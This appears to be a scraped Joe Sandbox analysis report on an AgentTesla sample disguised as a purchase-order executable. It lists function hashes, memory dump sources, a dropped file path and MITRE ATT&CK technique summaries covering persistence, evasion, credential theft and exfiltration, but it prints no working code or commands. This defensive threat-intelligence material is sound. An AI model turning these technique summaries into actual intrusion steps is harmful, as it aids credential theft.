Opcode ID: ac5a19350daca693d8fda4b4f57a2b2a23a4404b9020d71aabdd0643ceb99dfb
Instruction ID: aa30472b6c3ba5e8d31382a94a317da3e7915966fe54457e972b4c16ca60afc3
Opcode Fuzzy Hash: ac5a19350daca693d8fda4b4f57a2b2a23a4404b9020d71aabdd0643ceb99dfb
Instruction Fuzzy Hash: A9E07D31B203006BF764676548137F232A94F89242F21143CE756DF2C0CBF1E801C391

Function 06348EF8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453525457.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6330000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 622c19643fb8c5ac452b8dcfdc49e91b68bb4a3021deb4548d746e92c5be95a3
Instruction ID: c4987cfdcf1846ad936e197c9b6f978fde45e345c03fe85022e89b1930f8b6e1
Opcode Fuzzy Hash: 622c19643fb8c5ac452b8dcfdc49e91b68bb4a3021deb4548d746e92c5be95a3
Instruction Fuzzy Hash: CCE0C974D05208EFCB84DFA9D4446ACF7F5EB48200F10C1A9981893340D631AE45CF80

Function 00F44C43 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5b13fc70aa92691e47fe8ec3dbac2f7026c9430cc47e659a8a0f58e4af722a0
Instruction ID: f5fbe347de10de99ef1dea98c46928c8f8b19222dae9adc9bcbc9e7ffbfa5f86
Opcode Fuzzy Hash: d5b13fc70aa92691e47fe8ec3dbac2f7026c9430cc47e659a8a0f58e4af722a0
Instruction Fuzzy Hash: FEF0D47890222ADFEBA08F65CD487DDBBB0FB59319F4044E6E80DA2241CB744AC4DF09

Function 00F4F7A0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf55a26f45f6ca2eaa57e6c9c618b30feac9c79926cb32132bade057537c2904
Instruction ID: bbc7678dcbfb7ac29d55a8b40eca845cc274ac1bddad86285c64a38fd4ca2a07
Opcode Fuzzy Hash: bf55a26f45f6ca2eaa57e6c9c618b30feac9c79926cb32132bade057537c2904
Instruction Fuzzy Hash: 3DE0E574E04208EFCB80DFA9D448AACBBF4EB49310F1080EAD818A3360D6349E44DF40

Function 0634E9F8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453525457.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6330000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1977e76b58ac8bce92b8c04188dd26b8d33402ea9201a2aec9484772dba2d91b
Instruction ID: 77ef4d4f44237f26512f662de060696220a1bf87e7288d543efc59272a34f063
Opcode Fuzzy Hash: 1977e76b58ac8bce92b8c04188dd26b8d33402ea9201a2aec9484772dba2d91b
Instruction Fuzzy Hash: 0EE04F78908208AFC744DF95D84096DFBB8BB45300F10C0A9984467381C631AA45EB94

Function 06347B00 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453525457.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6330000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 178ef038e8801d67e6dc1d09052117181e3fd2ab6bbacf1b862f72b4b13a888d
Instruction ID: 808a5523eabd64a46fbd03a6a0ccf89f575264a0c137c37dd0f357d99aa627db
Opcode Fuzzy Hash: 178ef038e8801d67e6dc1d09052117181e3fd2ab6bbacf1b862f72b4b13a888d
Instruction Fuzzy Hash: 06E01A34D04208AFCB44DF99D4406ACFBF8EB89200F1081E9C81953381D7316A45DF80

Function 06348EB0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453525457.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6330000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 156693a2d2a64b3f9046a11badd338c972940d64a27421f0c618aad52ff8100a
Instruction ID: abae56f9d320a396526e1279435438146f1543125fa1d82d0000a163b73c1c4b
Opcode Fuzzy Hash: 156693a2d2a64b3f9046a11badd338c972940d64a27421f0c618aad52ff8100a
Instruction Fuzzy Hash: D1E0C23280120CEFCB00FFF9D804A5EB7F8DB45200F1044A5950893150EF305A04EBD1

Function 0634FEE0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453525457.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6330000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8242dec01b07869b0c16d5004b7b95f599bd6c84a9a6abbd3743416d5a5c1377
Instruction ID: 5fda0adb1fb91f4e8b53c4390780fd58dd262345e03eaade0b098c34069ed431
Opcode Fuzzy Hash: 8242dec01b07869b0c16d5004b7b95f599bd6c84a9a6abbd3743416d5a5c1377
Instruction Fuzzy Hash: 96E08C34908208EFC704EB98E88096CFBB8AB85301F24909CC80927781C731AE86DB91

Function 0634CB68 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453525457.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6330000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8242dec01b07869b0c16d5004b7b95f599bd6c84a9a6abbd3743416d5a5c1377
Instruction ID: 42389ba17a1976ce691ec4cea536a2ba354283c0f62cbfa91c84333c80475886
Opcode Fuzzy Hash: 8242dec01b07869b0c16d5004b7b95f599bd6c84a9a6abbd3743416d5a5c1377
Instruction Fuzzy Hash: F9E08C34909208EBC704EFA4E94096CFBB8EB85310F109098880823380CA316E46CBD1

Function 00F4F148 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa463c77ad6d70916ca970ac2c71def9f05ee1727ead865fa4877da4c6df6cc3
Instruction ID: da5a2c8f24d0c13bcece009d2ab3c06375c928de21c2514ef5f33ee3678f65ac
Opcode Fuzzy Hash: aa463c77ad6d70916ca970ac2c71def9f05ee1727ead865fa4877da4c6df6cc3
Instruction Fuzzy Hash: 62E0E270D00308EFCB44EFB9D84569DBBB4AB44201F6040E98808A2390E7319A94DB91

Function 00F4630B Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3baa8b4166c2f38ec54f97d7ee0160250b2e77bde223833f850a6f6e82d6f93
Instruction ID: 820b97b0f0c9b700b2e5452b6cbcd612e4282a7e695f92cb266c1d77e86694fd
Opcode Fuzzy Hash: a3baa8b4166c2f38ec54f97d7ee0160250b2e77bde223833f850a6f6e82d6f93
Instruction Fuzzy Hash: 81E01AB990C3988FCB908B24C8986897B70AB5A310F5104E7E90DAB286CAB54A80DF40

Function 061B84A0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de584edceb460bee7913686879f82b83cce4e4182348ccdf4c788508f81d495
Instruction ID: c5f4c4de6fe38b7f3ae01d1aa71d79e5ee6f56ba7fc3067407b98c4472d7c31a
Opcode Fuzzy Hash: 5de584edceb460bee7913686879f82b83cce4e4182348ccdf4c788508f81d495
Instruction Fuzzy Hash: 27D012359043129BD765D714E940E8B7BE59F80216B04CE29A04A4B528DB70BD4A8B81

Function 061BEF10 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27297bc1316447d275530f20c1354cc575fd931daa16643310b2f8c915168bfc
Instruction ID: 238bcb3d3eaf9f00d20565fe3453b33d35ec1a49d325f5254f4ad2c7d1b1d186
Opcode Fuzzy Hash: 27297bc1316447d275530f20c1354cc575fd931daa16643310b2f8c915168bfc
Instruction Fuzzy Hash: 5BD012320906086BE6045648DC4DBA17B3CD735212F94913AE604D1A62CE2BA4539994

Function 061BCD38 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 504e897c03fc6e171b673a905c516179e7d9b087b372c4ba89f96678caf6d41e
Instruction ID: 74b0aa98ffb618b08a53bb69933730b6cfc64bf4fc7ccaad49a89368638a14d8
Opcode Fuzzy Hash: 504e897c03fc6e171b673a905c516179e7d9b087b372c4ba89f96678caf6d41e
Instruction Fuzzy Hash: FFD01232080204AFD7008A1CDC42FD17B78EB25221F544261F604D7F31C23AE8128995

Function 00F4EFC8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ae8d11a1e094f03417ebe824c3a29d8fc44ec2ba6561ab10256e441500eee51
Instruction ID: f2801914a2344c079ec289ce92068195ff3811939671d5a7500daa99648f7d18
Opcode Fuzzy Hash: 8ae8d11a1e094f03417ebe824c3a29d8fc44ec2ba6561ab10256e441500eee51
Instruction Fuzzy Hash: F5B02B3001030447C34013C7B40C7307A9C5303325F400820560E118B04BB04844CE44

Function 061BAE21 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae4917c334df325270eb6dd00c3018c89efb1421d1fa5315c0dd20332780f6dd
Instruction ID: 10bfe59cebfb82f8eba412bd412620bdbf5f2d3b12ffd61c28218d758c5d39da
Opcode Fuzzy Hash: ae4917c334df325270eb6dd00c3018c89efb1421d1fa5315c0dd20332780f6dd
Instruction Fuzzy Hash: 7AC08CE204C2C05FC74A8764C44A0EB3FA48F1221171A4893D0C18B023C22DC428CA32

Function 00F40841 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1407058421.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f40000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09f3c61964a6e339c713f90450a5f08be8d178b7bf6982a2a176b9dd3cb86194
Instruction ID: 54a162e482e62a67cd92943fcfb570f204cb80e113803d9bcb21f14e308b0e5c
Opcode Fuzzy Hash: 09f3c61964a6e339c713f90450a5f08be8d178b7bf6982a2a176b9dd3cb86194
Instruction Fuzzy Hash: F4C0480595E2D94ED70762B518211E02FF1A88B29138904DB89C1861ABE84E245AA2A6

Function 061BAE30 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 061BEF20 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1453039912.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_61b0000_Iujcy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40332dc711d20d5a94e7ec1de2443a14878a1bc97085deafeda0e25bfa5bb76
Instruction ID: 55e1cb4fac34cd9811c5c5d0b7aa243018e70fbc5fa11895fdb46d63463f52cb
Opcode Fuzzy Hash: a40332dc711d20d5a94e7ec1de2443a14878a1bc97085deafeda0e25bfa5bb76
Instruction Fuzzy Hash: 81B0923200020CABC7009B94E804855BB69AB59700B40C029A609061228B33A822EAD4

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Iujcy.exe

C:\Users\user\AppData\Roaming\Iujcy.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Function 057D4EE0 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Function 057D75C0 Relevance: 3.6, Strings: 2, Instructions: 1086
COMMON

Function 05B13A90 Relevance: 3.1, Strings: 2, Instructions: 640
COMMON

Function 05AF9DF8 Relevance: 3.0, Strings: 2, Instructions: 544
COMMON

Function 05AF9DE9 Relevance: 2.7, Strings: 2, Instructions: 151
COMMON

Function 05B14320 Relevance: 6.6, Strings: 5, Instructions: 337
COMMON

Function 05B16228 Relevance: 4.2, Strings: 3, Instructions: 477
COMMON

Function 05B17EE0 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre